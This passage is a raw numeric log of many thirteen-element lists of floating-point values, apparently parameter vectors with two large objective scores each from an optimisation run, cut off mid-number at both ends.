101076246798.6337]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15, 8.765174154706532e-16, 2.542150809952725e-05, -1.7997194394724915e-06, -1.850709631603352e-08, 9.087619653117874e-10, 168715457724.7375, 101683114493.3993]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.849645416672899e-11, -1.432701673757514e-10, -1.803543054789903e-15, 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06, -1.836034443165441e-08, 9.087619653117874e-10, 153789626574.96255, 105699410466.83022]\n\n[-8.372802930516975e-10, -1.3398025228100945e-12, -1.9531413192683389e-13, 4.855683396544643e-11, -1.4675478300173032e-10, -1.803543054789903e-15, 8.714032924475303e-16, 2.4957985197946978e-05, -1.793948394990656e-06, -1.836034443165441e-08, 9.081976758127089e-10, 159560429502.34207, 105861289429.36061]\n\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.869384519400452e-11, -1.432701673757514e-10, -1.7864100157215748e-15, 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06, -1.836034443165441e-08, 9.087619653117874e-10, 147461834890.53723, 106068644665.40553]\n\n[-8.372802930516975e-10, -1.3292316984383345e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4760843266911815e-10, -1.7864100157215748e-15, 8.706272486016714e-16, 2.492800478197597e-05, -1.7933608637070708e-06, -1.836034443165441e-08, 9.087979750822277e-10, 147793960453.4741, 109638154986.2024]\n\n[-8.29844666406642e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.8434260838579935e-11, -1.4561659265574012e-10, -1.819718397269023e-15, 8.775397316555329e-16, 2.4948775411850268e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.081976758127089e-10, 150492287670.62976, 114344342719.97507]\n\n[-8.406587076953522e-10, -1.318355348076889e-12, -1.9519777560623135e-13, 4.855683396544643e-11, -1.4760843266911815e-10, -1.815921924023075e-15, 8.839563844754409e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.081976758127089e-10, 148227079557.78632, 115101067854.31332]\n\n[-8.389236670603421e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.717072130867646e-16, 2.4957985197946978e-05, -1.7900208911755532e-06, -1.836034443165441e-08, 9.087619653117874e-10, 137339476236.27339, 120797794814.05704]\n\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.705169785374419e-16, 2.492800478197597e-05, -1.786297491730252e-06, -1.836034443165441e-08, 9.087619653117874e-10, 128365631923.39072, 133721716481.47603]\n\n[-8.361552586353477e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15, 8.705169785374419e-16, 2.483403849637781e-05, -1.783565701728919e-06, -1.836034443165441e-08, 9.095300241628919e-10, 123047993752.2489, 147005409641.27127]\n\n[-9.129396902499863e-10, -1.290047843436073e-12, -2.702634930634393e-13, 4.58556551164694e-11, -1.8724359625458014e-10, -2.1792166675464865e-15, 9.365717147446797e-16, 1.8994698205972217e-05, -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10, 169675879824.58978, 156722470654.13324]\n\n[6.303262263534727e-10, -1.2096663849982051e-12, -2.5988950272728827e-13, 4.701662665204773e-11, -1.4934765549498044e-10, -2.0495920936053975e-15, 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10, 108072398467.48868, 167972224844.19583]\n\n[6.303262263534727e-10, -1.2096663849982051e-12, -2.5988950272728827e-13, 4.701662665204773e-11, -1.4986345441105813e-10, -2.0495920936053975e-15, 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10, 108072398467.75635, 167972224843.92523]\n\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15, 9.365717147446797e-16, 1.9540146753875297e-05, -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.03189, 192873830899.82352]\n\n[6.303262263534727e-10, -1.290047843436073e-12, -2.5988950272728827e-13, 4.58556551164694e-11, -1.4986345441105813e-10, -2.1913589342035502e-15, 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10, 164354464752.25952, 160840990423.46024]\n\n[6.354744988103506e-10, -1.2096663849982051e-12, -1.830526663998671e-13, 4.6589669053151376e-11, -1.4986345441105813e-10, -2.0495920936053975e-15, 8.502785255135087e-16, 1.894858193847651e-05, -1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10, 96467208837.94556, 179586543004.98117]\n\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, 4.58556551164694e-11, -1.8580228849463816e-10, -2.1913589342035502e-15, 9.365717147446797e-16, 1.9540146753875297e-05, -1.8218396850604304e-06, -1.3360134446642706e-08, 8.759216763039946e-10, 117765020064.66293, 187118262382.8758]\n\n[-9.129396902499863e-10, -1.3004166005044262e-12, -1.8356995493902235e-13, 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15, 9.365717147446797e-16, 1.962681376929987e-05, -1.8050933870374392e-06, -1.3418860642065019e-08, 8.693561802236366e-10, 122674650037.46736, 187415567631.77402]\n\n[-9.212545260772544e-10, -1.2799153483071088e-12, -1.8213920664100724e-13, 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15, 9.365717147446797e-16, 1.9540146753875297e-05, -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.03189, 192873830899.82352]\n\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, 4.6154548476823616e-11, -1.8724359625458014e-10, -2.1913589342035502e-15, 9.358479354640953e-16, 1.9540146753875297e-05, -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.02731, 192873830899.82806]\n\n[2.2152115305769157e-10, -1.6907719215642795e-12, -2.5108769063589337e-13, 4.9793760275117476e-11, -2.0780774158604122e-10, -2.1593626664102876e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.77876424822685e-10, 170388218306.66492, 168925348515.4128]\n\n[2.2152115305769157e-10, -1.6907719215642795e-12, -2.1051647732787472e-13, 4.9793760275117476e-11, -2.0780774158604122e-10, -2.1790706433018085e-15, 8.836470142939426e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.771058818345121e-10, 191821821495.1242, 158798904598.69617]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -2.1593626664102876e-15, 8.836470142939426e-16, 2.0217203662255432e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.771058818345121e-10, 177069079234.4985, 163375067226.8736]\n\n[2.213664545134999e-10, -1.2059133330572482e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -2.1593626664102876e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.508245699810314e-08, 8.771058818345121e-10, 197879714583.27084, 152444791757.7255]\n\n[0.0, -1.223723210207519e-12, -2.1051647732787472e-13, 4.971358693780409e-11, -1.7352085678160897e-10, -2.165433707987142e-15, 7.304553415989529e-16, 2.0047355685146273e-05, -1.7657604268720381e-06, -1.4977385439375226e-08, 8.771058818345121e-10, 197945074606.02325, 153164597685.87036]\n\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 111986329581.05826, 155849166742.8801]\n\n[2.2133713135172913e-10, -1.2059133330572482e-12, -2.5107145183244764e-13, 5.011120217163613e-11, -1.724660990140153e-10, -2.1790706433018085e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.771058818345121e-10, 187269085984.5673, 161472427331.15216]\n\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11, -1.7677981323511262e-10, -2.145058695065051e-15, 7.430575474541962e-16, 2.0053347897812537e-05, -1.7639524821935923e-06, -1.4682044872577598e-08, 8.728626586100963e-10, 152433850624.54852, 175966043507.07343]\n\n[0.0, -1.223723210207519e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -2.1790706433018085e-15, 7.430575474541962e-16, 1.9918519209106862e-05, -1.7685796144533914e-06, -1.4682044872577598e-08, 8.771058818345121e-10, 153535961138.3572, 184829802626.36642]\n\n[2.2152115305769157e-10, -1.200937983572784e-12, -2.1065990049856794e-13, 5.011120217163613e-11, -1.7420072583381303e-10, -1.8426407940693324e-15, 7.454251311051652e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.508245699810314e-08, 8.771058818345121e-10, 92670242378.77588, 189416231139.84406]\n\n[0.0, -1.2207456906260254e-12, -2.1065990049856794e-13, 4.9793760275117476e-11, -2.0772853669541976e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 1.9867416915370552e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.728626586100963e-10, 160631139543.06137, 122019730569.7476]\n\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7677981323511262e-10, -1.857281675942834e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 153487531028.94116, 128597452665.91768]\n\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 142632578694.80914, 130195065921.46504]\n\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, 161449199082.99103]\n\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11, -1.7677981323511262e-10, -1.857281675942834e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.769936435419886e-06, -1.4682044872577598e-08, 8.728626586100963e-10, 100156348461.68698, 161778485371.36353]\n\n[0.0, -1.1984578022968498e-12, -2.1065990049856794e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.760544278271184e-10, 100072993312.46272, 171303112707.4717]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 4.9793760275117476e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 8.836470142939426e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 97245352689.07887, 174341101475.58182]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.9675085987122204e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 92503635735.71886, 182996786041.40976]\n\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11, -1.7677981323511262e-10, -2.1612081417375267e-15, 7.470344646267989e-16, 2.0053347897812537e-05, -1.7639524821935923e-06, -1.4645406166689473e-08, 8.730660207999707e-10, 148185335900.70355, 185221791801.95062]\n\n[2.2111462065028517e-10, -1.2207456906260254e-12, -2.1065990049856794e-13, 5.056589741460715e-11, -1.7420072583381303e-10, -1.8426407940693324e-15, 7.454251311051652e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.508245699810314e-08, 8.771058818345121e-10, 92670242378.76936, 189416231139.85312]\n\n[2.2152115305769157e-10, -1.2207456906260254e-12, -2.1065990049856794e-13, 5.011120217163613e-11, -1.7420072583381303e-10, -1.8276902524925885e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.771058818345121e-10, 90666406593.2125, 190153350507.14474]\n\n[2.2152115305769157e-10, -1.2049195466583994e-12, -2.1065990049856794e-13, 4.98075339514226e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 7.454251311051652e-16, 2.0095046248399238e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.771058818345121e-10, 89706134652.28279, 197738317572.1617]\n\n[0.0, -1.2031098015567e-12, -2.1065990049856794e-13, 5.0102593857564815e-11, -1.7352085678160897e-10, -1.819039898810471e-15, 7.460417812765263e-16, 2.0200374650352852e-05, -1.7758673160173464e-06, -1.5202351660972107e-08, 8.760544278271184e-10, 160476853944.9334, 119035825863.27417]\n\n[2.2152115305769157e-10, -1.2031098015567e-12, -2.5161591646068603e-13, 4.9793760275117476e-11, -1.7849498396021264e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5344868185414675e-08, 8.771058818345121e-10, 180743589801.84604, 120144468135.82727]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.947687927376915e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.04140411384885e-05, -1.7639524821935923e-06, -1.5078308038358913e-08, 8.683463468773267e-10, 146622662638.346, 120359956158.03543]\n\n[0.0, -1.1984578022968498e-12, -2.094909506024221e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.857281675942834e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7813149517985466e-06, -1.5091093694835327e-08, 8.760544278271184e-10, 171477577754.58575, 120995758664.39177]\n\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.5108769063589337e-13, 4.9967768219433575e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.5091093694835327e-08, 8.703632209100975e-10, 151029089477.88403, 121221447183.73479]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, 123962248783.03809]\n\n[2.233355889138985e-10, -1.2031098015567e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 148301377250.4212, 129257349906.46594]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.448076765658434e-16, 2.0200374650352852e-05, -1.7728642137544318e-06, -1.517941226634992e-08, 8.771058818345121e-10, 131981382341.97574, 129372470770.49553]\n\n[0.0, -1.2031098015567e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.82610373802557e-15, 8.836470142939426e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 142632578694.80914, 130195065921.46504]\n\n[-5.2595470648843136e-09, -1.2003583976149596e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7461898455625076e-10, -1.8426407940693324e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 142718091682.67987, 132029509845.4832]\n\n[2.2257852388875064e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.9793760275117476e-11, -1.7380412465809723e-10, -1.841021101878205e-15, 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.750599822793858e-10, 126150709659.35735, 137741348069.72827]\n\n[0.0, -1.2344709098355012e-12, -2.090479539659853e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.857281675942834e-15, 7.485411998460075e-16, 1.981538293869461e-05, -1.769936435419886e-06, -1.4682044872577598e-08, 8.711551918674385e-10, 114088676894.18327, 143862344272.2216]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 119621740814.33159, 143868003797.30536]\n\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.088572649745598e-13, 4.995108013618423e-11, -1.7207960562590789e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.015341505664753e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10, 115848531243.76457, 151496866956.06183]\n\n[7.878840270455085e-09, -1.2071709641632366e-12, -2.088572649745598e-13, 5.022894055850661e-11, -1.7352085678160897e-10, -1.8610445297760222e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.760544278271184e-10, 113456911424.16617, 154679332976.7693]\n\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.760544278271184e-10, 107979663117.77498, 158587944243.3901]\n\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 7.451496753853957e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, 161449199082.99103]\n\n[2.1977210438689425e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, 161449199082.99103]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.099781497267347e-13, 4.9793760275117476e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.0299458575301996e-05, -1.756844278469525e-06, -1.5202351660972107e-08, 8.750599822793858e-10, 101036412554.48618, 178952195751.12357]\n\n[0.0, -1.2071709641632366e-12, -2.088572649745598e-13, 4.9793760275117476e-11, -1.7352085678160897e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.0200374650352852e-05, -1.7587739009571313e-06, -1.5202351660972107e-08, 8.768692858683927e-10, 101115281125.52821, 181312381109.07834]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.9675085987122204e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 92503635735.71886, 182996786041.40976]\n\n[2.2295275331941093e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 4.9675085987122204e-11, -1.7558160485557454e-10, -1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 92503635735.71886, 182996786041.40976]\n\n[0.0, -1.223723210207519e-12, -2.1065990049856794e-13, 5.011120217163613e-11, -1.7707453284878416e-10, -1.866210682668369e-15, 7.430575474541962e-16, 1.9722774245768875e-05, -1.769936435419886e-06, -1.4682044872577598e-08, 8.760544278271184e-10, 88317753591.74515, 193403737351.61066]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7493239251088378e-06, -1.5085870105283375e-08, 8.701394499644777e-10, 90763281590.1167, 199093039398.6542]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.857281675942834e-15, 7.387655049943961e-16, 1.981538293869461e-05, -1.769936435419886e-06, -1.4563889985865401e-08, 8.644597543611974e-10, 157634872361.7637, 120593643708.66519]\n\n[2.2257852388875064e-10, -1.2070230966272908e-12, -2.1051647732787472e-13, 5.027931250826744e-11, -1.755220169767042e-10, -1.810973414699955e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08, 8.750599822793858e-10, 159354716917.0895, 121269083493.68436]\n\n[0.0, -1.2031098015567e-12, -2.090479539659853e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8577367523496564e-15, 7.430575474541962e-16, 1.9814643005749893e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.711551918674385e-10, 168378423128.42877, 121439949900.90005]\n\n[2.198369754018213e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7513929529124395e-10, -1.82610373802557e-15, 7.448076765658434e-16, 2.0042195789951223e-05, -1.7728642137544318e-06, -1.5013783998899997e-08, 8.734593739302048e-10, 147068576327.25705, 122027384226.92]\n\n[2.2257852388875064e-10, -1.2059133330572482e-12, -2.090479539659853e-13, 4.9793760275117476e-11, -1.7849498396021264e-10, -1.841021101878205e-15, 7.556782953802372e-16, 2.022642042947946e-05, -1.769936435419886e-06, -1.5202351660972107e-08, 8.750599822793858e-10, 149871632956.7388, 122750625888.09634]\n\n[2.2152115305769157e-10, -1.2344709098355012e-12, -2.1013781830316155e-13, 5.011120217163613e-11, -1.7343044399460855e-10, -1.857281675942834e-15, 7.430575474541962e-16, 2.0343113714890682e-05, -1.7639524821935923e-06, -1.520980077906525e-08, 8.721578527250325e-10, 151082881535.07886, 122935226427.98189]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, 123962248783.03809]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.735477478457909e-10, 133427418313.38545, 131702579310.68652]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.116126459765591e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.517941226634992e-08, 8.771058818345121e-10, 137250169853.3863, 133211383937.09729]\n\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.842789515995345e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 123172560507.99263, 143105235055.608]\n\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1171136727356646e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 119639757591.69511, 143860615432.91934]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10, 118202331336.15999, 145092770865.8836]\n\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.021867485100539e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.760544278271184e-10, 110377805870.9487, 155477031697.76462]\n\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7281503437685213e-10, -1.82610373802557e-15, 8.836470142939426e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.760544278271184e-10, 107979663117.63412, 158587944243.89005]\n\n[0.0, -1.2031098015567e-12, -2.522559178506789e-13, 5.003845283040925e-11, -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.9950498914670327e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.760544278271184e-10, 99132279868.34593, 171185572417.85907]\n\n[2.2257852388875064e-10, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.82610373802557e-15, 8.811799226535086e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.508244156181531e-08, 8.760544278271184e-10, 93130287119.72461, 180430143233.58368]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.8265258253512156e-15, 7.430575474541962e-16, 2.0240988631290876e-05, -1.7728642137544318e-06, -1.5013783998899997e-08, 8.784555835692595e-10, 86927194519.4496, 183449646874.34637]\n\n[7.863427642383715e-09, -1.2031098015567e-12, -2.5161591646068603e-13, 4.9793760275117476e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.500055802123721e-08, 8.750599822793858e-10, 87084714365.5935, 191076754457.2524]\n\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.857281675942834e-15, 7.485411998460075e-16, 1.9750639916729973e-05, -1.769936435419886e-06, -1.5013783998899997e-08, 8.825388912755251e-10, 96474604776.96465, 194275355409.06598]\n\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 4.9793760275117476e-11, -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, 2.022642042947946e-05, -1.7639524821935923e-06, -1.503739318330452e-08, 8.760544278271184e-10, 86984982238.58047, 194967876303.00238]\n\n[1.5200576895768509e-09, -1.2059133330572482e-12, -2.0752021923147355e-13, 5.011120217163613e-11, -1.7849498396021264e-10, -1.82610373802557e-15, 7.479116563110691e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.4682044872577598e-08, 8.724478065416361e-10, 82147238279.93182, 198112832281.90573]\n\n[2.223825616669009e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.011120217163613e-11, -1.7326944854292794e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.534155691698868e-08, 8.721578527250325e-10, 175522473614.0067, 115813093887.0164]\n\n[2.2296631466270538e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.430575474541962e-16, 2.0431066002844864e-05, -1.7780476812466564e-06, -1.5013783998899997e-08, 8.717160979795123e-10, 146919548917.9041, 118508631814.89664]\n\n[2.2152115305769157e-10, -1.2131115225525171e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.529126273308479e-08, 8.750599822793858e-10, 189141514324.11395, 119478476003.54858]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1171136727356646e-13, 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, -1.515944456372276e-08, 8.735477478457909e-10, 171393648132.89902, 119746195767.88297]\n\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.680779846505464e-10, 198413310387.34686, 120002114057.9749]\n\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06, -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, 123962248783.03809]\n\n[2.2152115305769157e-10, -1.1981340041661674e-12, -2.0952905567462806e-13, 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15, 7.397318554179349e-16, 1.983133919352831e-05, -1.7639524821935923e-06, -1.5013783998899997e-08, 8.721578527250325e-10, 146191133033.73245, 124495463707.0261]\n\n[2.220169404817274e-10, -1.2059133330572482e-12, -2.0840667223230766e-13, 5.0388416851351e-11, -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, 